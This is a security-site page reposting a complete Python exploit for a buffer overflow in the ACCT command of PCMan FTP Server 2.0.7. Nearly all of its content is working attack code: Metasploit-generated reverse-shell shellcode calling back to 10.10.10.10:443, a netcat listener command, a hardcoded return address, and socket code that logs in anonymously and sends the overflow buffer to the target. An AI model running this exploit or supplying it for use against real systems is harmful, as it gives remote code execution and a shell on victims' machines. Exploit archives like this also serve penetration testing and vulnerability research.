首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow 来源：vfocus.net 作者：Cybernetic 发布时间：2016-11-04   #!/usr/bin/env python #-*- coding: utf-8 -*-   # Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit # Date: 3/11/2016 # Exploit Author: Cybernetic # Version: 2.0 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A   import socket, os, sys ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7   #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c   #nc -lvp 443 #Send exploit   shellcode=("\xba\xac\x84\x20\xa3\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" "\x52\x31\x57\x12\x83\xc7\x04\x03\xfb\x8a\xc2\x56\xff\x7b\x80" "\x99\xff\x7b\xe5\x10\x1a\x4a\x25\x46\x6f\xfd\x95\x0c\x3d\xf2" "\x5e\x40\xd5\x81\x13\x4d\xda\x22\x99\xab\xd5\xb3\xb2\x88\x74" "\x30\xc9\xdc\x56\x09\x02\x11\x97\x4e\x7f\xd8\xc5\x07\x0b\x4f" "\xf9\x2c\x41\x4c\x72\x7e\x47\xd4\x67\x37\x66\xf5\x36\x43\x31" "\xd5\xb9\x80\x49\x5c\xa1\xc5\x74\x16\x5a\x3d\x02\xa9\x8a\x0f" "\xeb\x06\xf3\xbf\x1e\x56\x34\x07\xc1\x2d\x4c\x7b\x7c\x36\x8b" "\x01\x5a\xb3\x0f\xa1\x29\x63\xeb\x53\xfd\xf2\x78\x5f\x4a\x70" "\x26\x7c\x4d\x55\x5d\x78\xc6\x58\xb1\x08\x9c\x7e\x15\x50\x46" "\x1e\x0c\x3c\x29\x1f\x4e\x9f\x96\x85\x05\x32\xc2\xb7\x44\x5b" "\x27\xfa\x76\x9b\x2f\x8d\x05\xa9\xf0\x25\x81\x81\x79\xe0\x56" "\xe5\x53\x54\xc8\x18\x5c\xa5\xc1\xde\x08\xf5\x79\xf6\x30\x9e" "\x79\xf7\xe4\x31\x29\x57\x57\xf2\x99\x17\x07\x9a\xf3\x97\x78" "\xba\xfc\x7d\x11\x51\x07\x16\xde\x0e\x06\xa1\xb6\x4c\x08\x2c" "\xfc\xd8\xee\x44\x12\x8d\xb9\xf0\x8b\x94\x31\x60\x53\x03\x3c" "\xa2\xdf\xa0\xc1\x6d\x28\xcc\xd1\x1a\xd8\x9b\x8b\x8d\xe7\x31" "\xa3\x52\x75\xde\x33\x1c\x66\x49\x64\x49\x58\x80\xe0\x67\xc3" "\x3a\x16\x7a\x95\x05\x92\xa1\x66\x8b\x1b\x27\xd2\xaf\x0b\xf1" "\xdb\xeb\x7f\xad\x8d\xa5\x29\x0b\x64\x04\x83\xc5\xdb\xce\x43" "\x93\x17\xd1\x15\x9c\x7d\xa7\xf9\x2d\x28\xfe\x06\x81\xbc\xf6" "\x7f\xff\x5c\xf8\xaa\xbb\x6d\xb3\xf6\xea\xe5\x1a\x63\xaf\x6b" "\x9d\x5e\xec\x95\x1e\x6a\x8d\x61\x3e\x1f\x88\x2e\xf8\xcc\xe0" "\x3f\x6d\xf2\x57\x3f\xa4")   shell= '\x90'*30 + shellcode buffer='\x41'*2007+ ret + shell + '\x43'*(696-len(shell))   print "Sending Buffer"   s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.1.10',21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('ACCT' +buffer+ '\r\n') s.close()   print "Attack Buffer Overflow Successfully Executed"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Axessh 4.2 - Denial Of Service ·IBM AIX 6.1/7.1/7.2.0.2 - 'lsm ·SweetRice 1.5.1 - Arbitrary Fi ·IBM AIX 5.3/6.1/7.1/7.2 - 'lqu ·Memcached 1.4.33 - PoC (3) ·Freefloat FTP Server 1.0 - 'SI ·Memcached 1.4.33 - PoC (2) ·PCMan FTP Server 2.0.7 - 'NLST ·Memcached 1.4.33 - PoC (1) ·PCMan FTP Server 2.0.7 - 'SITE ·Rapid PHP Editor 14.1 - Remote ·PCMan FTP Server 2.0.7 - 'PORT   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved